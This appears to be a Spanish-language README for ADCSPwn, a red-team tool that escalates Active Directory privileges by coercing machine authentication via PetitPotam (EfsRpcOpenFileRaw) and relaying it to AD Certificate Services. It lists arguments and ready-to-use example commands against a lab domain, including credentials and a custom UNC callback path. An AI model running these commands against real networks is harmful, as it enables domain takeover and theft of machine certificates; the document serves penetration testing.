
Una herramienta para escalar privilegios en una red de Active Directory mediante la coerción de autenticación de cuentas de máquina y la retransmisión al servicio de certificados.
Una herramienta para escalar privilegios en una red de Active Directory mediante la coerción de autenticación de cuentas de máquina (Petitpotam) y la retransmisión al servicio de certificados.
Ejecuta ADCSPwn en tu red objetivo.
Author: @_batsec_ - MDSec ActiveBreach
Contributor: @Flangvik - TrustedSec
Contributor: @424f424f - Black Hills Information Security
adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]
Required arguments:
adcs - Esta es la dirección del servidor AD CS al cual se retransmitirá la autenticación.
Optional arguments:
secure - Usar HTTPS con el servicio de certificados.
port - El puerto en el que ADCSPwn escuchará.
remote - Máquina remota desde la cual se activará la autenticación.
username - Nombre de usuario para un contexto no perteneciente al dominio.
password - Contraseña para un contexto no perteneciente al dominio.
dc - Controlador de dominio para consultar las plantillas de certificados (LDAP).
unc - Establecer una ruta de callback UNC personalizada para EfsRpcOpenFileRaw (Petitpotam).
output - Ruta de salida para almacenar el crt generado en base64.
Example usage:
adcspwn.exe --adcs cs.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --secure
adcspwn.exe --adcs cs.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share
EfsRpcOpenFileRaw.